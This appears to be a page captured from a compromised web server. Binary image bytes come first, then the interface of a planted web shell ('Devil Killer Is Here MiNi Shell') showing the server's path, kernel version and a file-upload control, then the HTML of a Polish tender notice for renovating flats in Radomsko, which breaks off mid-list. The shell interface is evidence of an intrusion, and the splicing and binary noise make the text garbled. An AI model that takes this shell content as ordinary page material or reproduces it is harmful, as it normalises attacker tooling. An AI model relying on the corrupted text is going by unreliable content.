JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241128/0062181601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont lokali mieszkalnych położonych w Radomsku przy ul.Warszyca1/11i21,<br/>ul.Warszyca4/16i6,ul.Wyszyńskiego24/,ul.Narutowicza31/3i42/2,ul.Młodzowskiej1/6,ul.Piłsudskiego25/8orazul.Plac3Maja12/4 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">TOWARZYSTWO BUDOWNICTWA SPOŁECZNEGO W RADOMSKU SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 592131798</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kościuszki 12 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radomsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">44 683 54 03</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@tbsradomsko.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.tbsradomsko.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Towarzystwo Budownictwa Społecznego w Radomsku Sp. z o.o. w imieniu Zamawiającego Miasta Radomsko</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">7722084240</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Kościuszki 12A</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Radomsko</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">97-500</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">44 683 54 03</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">sekretariat@tbsradomsko.com.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">http://bip.tbsradomsko.com.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont lokali mieszkalnych położonych w Radomsku przy ul.Warszyca1/11i21,<br/>ul.Warszyca4/16i6,ul.Wyszyńskiego24/,ul.Narutowicza31/3i42/2,ul.Młodzowskiej1/6,ul.Piłsudskiego25/8orazul.Plac3Maja12/4 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-28e3ec7d-df1c-45fb-ad09-7210d09fe7cb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00621816</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00529926/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont lokali mieszkalnych położonych w Radomsku przy ul. Warszyca1/11i21, ul. Warszyca4/16i6,ul.Wyszyńskiego24/,ul. Narutowicza31/3i42/2,ul. Młodzowskiej1/6,ul.Piłsudskiego25/8orazul.Plac3Maja12/4</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-28e3ec7d-df1c-45fb-ad09-7210d09fe7cb <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a wykonawcami odbywa się przy użyciu<br/>Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-<br/>Zamówienia):w pkt 3.1 Ogłoszenia o zamówieniu<br/>5. Wykonawca składa ofertę przy użyciu Platformy e-Zamówienia<br/>6.Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB<br/>7.W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres email:<br/>sekretariat@tbsradomsko.com.pl (maksymalny rozmiar przesyłanych plików 15 MB),z wyłączeniem składania ofert.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia.<br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa<br/>Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w<br/>zakładce „Centrum Pomocy”. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a<br/>wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2) Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3) Adres strony internetowej prowadzonego postępowania - link prowadzący bezpośrednio do widoku postępowania na Platformie e-<br/>Zamówienia: podany w pkt 3.1 Ogłoszenia o zamówieniu.Możliwość<br/>korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na<br/>Platformie e-Zamówienia pod adresem https://ezamowienia.gov.pl oraz zalogowania się na Platformie e-Zamówienia. Do korzystania<br/>z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia czyli wniosków o<br/>wyjaśnienie treści Specyfikacji Warunków Zamówienia (zgodnie z rozdziałem 15 SWZ) wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z<br/>usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia - https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu. Szczegółowe informacje w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotycząca RODO - szczegółowo określono w Rozdziale 24 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotycząca RODO - szczegółowo określono w Rozdziale 24 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TBS/UZP/3/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część nr 1 zamówienia pn. „Remont lokali mieszkalnych położonych w Radomsku przy ul. Warszyca 4/16 i 6, ul.<br/>Młodzowskiej 1/6”<br/>1) Przedmiotem części nr 1 zamówienia jest remont lokali mieszkalnych położonych w Radomsku przy ul. Warszyca 4/16 i<br/>6, ul. Młodzowskiej 1/6, który należy wykonać zgodnie z umową, specyfikacjami technicznymi wykonania i odbioru robót,<br/>rysunkami i opisem oraz zasadami wiedzy technicznej. Przedmiary robót załączone do SWZ pełnią tylko rolę informacyjną –<br/>obowiązującą formą wynagrodzenia jest ryczałt.<br/>2) Szczegółowy opis przedmiotu części nr 1 zamówienia stanowią:<br/>a) wzór umowy dot. części nr 1 zamówienia - stanowiący dodatek nr 8a,<br/>b) specyfikacja techniczna wykonania i odbioru robót – lokal ul. Warszyca 4/16- stanowiąca dodatek nr 9,<br/>c) rysunek stan istniejący – lokal ul. Warszyca 4/16 - stanowiący dodatek nr 10,<br/>d) rysunek stan projektowany wraz opisem zakresu prac – lokal ul. Warszyca 4/16 - stanowiący dodatek nr 11,<br/>e) dokumentacja zdjęciowa dot. części nr 1 zamówienia – lokal ul. Warszyca 4/16 stanowiąca dodatek nr 12,<br/>f) specyfikacja techniczna wykonania i odbioru robót – lokal ul. Warszyca 4/6- stanowiąca dodatek nr 14,<br/>g) rysunek stan istniejący – lokal ul. Warszyca 4/6 - stanowiący dodatek nr 15,<br/>h) rysunek stan projektowany wraz opisem zakresu prac – lokal ul. Warszyca 4/6 - stanowiący dodatek nr 16,<br/>i) dokumentacja zdjęciowa dot. części nr 1 zamówienia – lokal ul. Warszyca 4/6 stanowiąca dodatek nr 17,<br/>j) specyfikacja techniczna wykonania i odbioru robót – lokal ul. Młodzowska 1/6- stanowiąca dodatek nr 19,<br/>k) rysunek stan istniejący – lokal ul. Młodzowska 1/6 - stanowiący dodatek nr 20,<br/>l) rysunek stan projektowany wraz opisem zakresu prac – lokal ul. Młodzowska 1/6 - stanowiący dodatek nr 21,<br/>m) dokumentacja zdjęciowa dot. części nr 1 zamówienia – lokal ul. Młodzowska 1/6 stanowiąca dodatek nr 22.<br/>3) Ze względu na charakter wynagrodzenia (ryczałt) - funkcję informacyjną pełnią:<br/>a) Przedmiar robót b. budowlana - lokal ul. Warszyca 4/16 - stanowiący dodatek nr 13a ,<br/>b) Przedmiar robót b. elektryczna - lokal ul. Warszyca 4/16 - stanowiący dodatek nr 13b ,<br/>c) Przedmiar robót b. sanitarna - lokal ul. Warszyca 4/16 - stanowiący dodatek nr 13c ,<br/>d) Przedmiar robót b. budowlana - lokal ul. Warszyca 4/6 - stanowiący dodatek nr 18a ,<br/>e) Przedmiar robót b. elektryczna - lokal ul. Warszyca 4/6 - stanowiący dodatek nr 18b ,<br/>f) Przedmiar robót b. sanitarna - lokal ul. Warszyca 4/6 - stanowiący dodatek nr 18c ,<br/>g) Przedmiar robót b. budowlana - lokal ul. Młodzowska 1/6 - stanowiący dodatek nr 23a,<br/>h) Przedmiar robót b. elektryczna - lokal ul. Młodzowska 1/6 - stanowiący dodatek nr 23b,<br/>i) Przedmiar robót b. sanitarna - lokal ul. Młodzowska 1/6 - stanowiący dodatek nr 23c .<br/>4) Zamawiający w opisie przedmiotu zamówienia zawartym w SWZ określił wymagania jakościowe odnoszące się do co<br/>najmniej głównych elementów składających się na przedmiot zamówienia w tym w umowie, opisach, specyfikacjach<br/>technicznych.<br/>5) Zgodnie z art. 101 ust. 4 ustawy w sytuacji, gdyby w opisach, przedmiarach, specyfikacjach technicznych, a więc w<br/>dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji<br/>technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy, a takim<br/>odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne<br/>opisywanym w każdej takiej normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji<br/>technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, aprobacie, specyfikacji<br/>technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub<br/>równoważne”. Jeżeli w w opisach, przedmiarach, specyfikacjach technicznych, użyto nazwy materiału(ów) lub<br/>urządzenia(ń), parametry identyfikujące producenta, pochodzenie, służą one jedynie do ustalenia charakterystyki, jakości<br/>tych materiałów lub urządzeń. Wykonawca ma obowiązek wbudować materiały lub urządzenia posiadające nie gorsze<br/>właściwości zapewniające zgodne z opisami, przedmiarami, specyfikacjami technicznymi funkcjonowanie elementów, części<br/>lub całego obiektu budowlanego. Tym samym dopuszcza się do stosowania przy realizacji zamówienia materiały lub<br/>urządzenia (ogólnie produkty) równoważne innych producentów. Jeżeli użyto w SWZ lub dodatkach wymogu posiadania<br/>certyfikatu wydanego przez jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę<br/>jednostkę jako środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w opisie<br/>przedmiotu zamówienia lub warunkach realizacji zamówienia oznacza, że Zamawiający akceptuje również certyfikaty<br/>wydane przez inne równoważne jednostki oceniające zgodność. Jeżeli wymagana jest określona etykieta, zamawiający<br/>akceptuje wszystkie etykiety potwierdzające, że dane roboty budowlane, dostawy lub usługi spełniają równoważne<br/>wymagania określonej przez zamawiającego etykiety.<br/>6) Określenie wymagań dotyczących zatrudniania przez wykonawcę lub podwykonawcę osób na podstawie stosunku pracy-szczegóły<br/>w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45262600-7 - Różne specjalne roboty budowlane</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316000-5 - Instalowanie systemów oświetleniowych i sygnalizacyjnych</p> <p class="mb-0">45317000-2 - Inne instalacje elektryczne</p> <p class="mb-0">45315000-8 - Instalowanie urządzeń elektrycznego ogrzewania i innego sprzętu elektrycznego w budynkach</p> <p class="mb-0">45231100-6 - Ogólne roboty budowlane związane z budową rurociągów</p> <p class="mb-0">45332000-3 - Roboty instalacyjne wodne i kanalizacyjne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla porównania ofert Zamawiający przyjmie:<br/>a) łączną cenę ryczałtową brutto obejmującą podatek od towarów i usług (z VAT) za wykonanie całości przedmiotu części nr 1<br/>zamówienia – wg przypisanej wagi kryterium Ceny (C) tj. 90 %<br/>i<br/>b) zadeklarowany okres gwarancji Wykonawcy (kryterium oceny ofert G) na cały przedmiot zamówienia w tym wykonane roboty oraz<br/>zastosowane materiały, z zastrzeżeniem że okres gwarancji Wykonawcy na zamontowane urządzenia będzie równy okresowi<br/>gwarancji udzielanej przez producenta (minimum 24 miesięcy), licząc od podpisania protokołu odbioru końcowego przedmiotu<br/>zamówienia – wg przypisanej wagi kryterium Okres gwarancji Wykonawcy (G) 10 %,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji Wykonawcy (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> część nr 2 zamówienia pn. „Remont lokali mieszkalnych położonych w Radomsku przy ul. Warszyca 1/11 i 21, ul.<br/>Piłsudskiego 25/8”:<br/>1) Przedmiotem części nr 2 zamówienia jest remont lokali mieszkalnych położonych w Radomsku przy ul. Warszyca 1/11 i<br/>21, ul. Piłsudskiego 25/8, który należy wykonać zgodnie z umową, specyfikacjami technicznymi wykonania i odbioru robót,<br/>rysunkami i opisem oraz zasadami wiedzy technicznej. Przedmiary robót załączone do SWZ pełnią tylko rolę informacyjną –<br/>obowiązującą formą wynagrodzenia jest ryczałt.<br/>2) Szczegółowy opis przedmiotu części nr 2 zamówienia stanowią:<br/>a) wzór umowy dot. części nr 2 zamówienia - stanowiący dodatek nr 8b,<br/>b) specyfikacja techniczna wykonania i odbioru robót – lokal ul. Warszyca 1/11- stanowiąca dodatek nr 24,<br/>c) rysunek stan istniejący – lokal ul. ul. Warszyca 1/11 - stanowiący dodatek nr 25,<br/>d) rysunek stan projektowany wraz opisem zakresu prac – lokal ul. Warszyca 1/11 - stanowiący dodatek nr 26,<br/>e) dokumentacja zdjęciowa dot. części nr 2 zamówienia – lokal ul. Warszyca 1/11 - stanowiąca dodatek nr 27,<br/>f) specyfikacja techniczna wykonania i odbioru robót – lokal ul. Warszyca 1/21- stanowiąca dodatek nr 29,<br/>g) rysunek stan istniejący – lokal ul. Warszyca 1/21 - stanowiący dodatek nr 30,<br/>h) rysunek stan projektowany wraz opisem zakresu prac – lokal ul. Warszyca 1/21 - stanowiący dodatek nr 31,<br/>i) dokumentacja zdjęciowa dot. części nr 2 zamówienia – lokal ul. Warszyca 1/21 stanowiąca dodatek nr 32,<br/>j) specyfikacja techniczna wykonania i odbioru robót – lokal ul. Piłsudskiego 25/8- stanowiąca dodatek nr 34,<br/>k) rysunek stan istniejący – lokal ul. Piłsudskiego 25/8- stanowiący dodatek nr 35,<br/>l) rysunek stan projektowany wraz opisem zakresu prac – lokal ul. Piłsudskiego 25/8 - stanowiący dodatek nr 36,<br/>m) dokumentacja zdjęciowa dot. części nr 2 zamówienia – lokal ul. Piłsudskiego 25/8 stanowiąca dodatek nr 37.<br/>3) Ze względu na charakter wynagrodzenia (ryczałt) - funkcję informacyjną pełnią:<br/>a) Przedmiar robót b. budowlana - lokal ul. Warszyca 1/11 - stanowiący dodatek nr 28a ,<br/>b) Przedmiar robót b. elektryczna - lokal ul. Warszyca 1/11 - 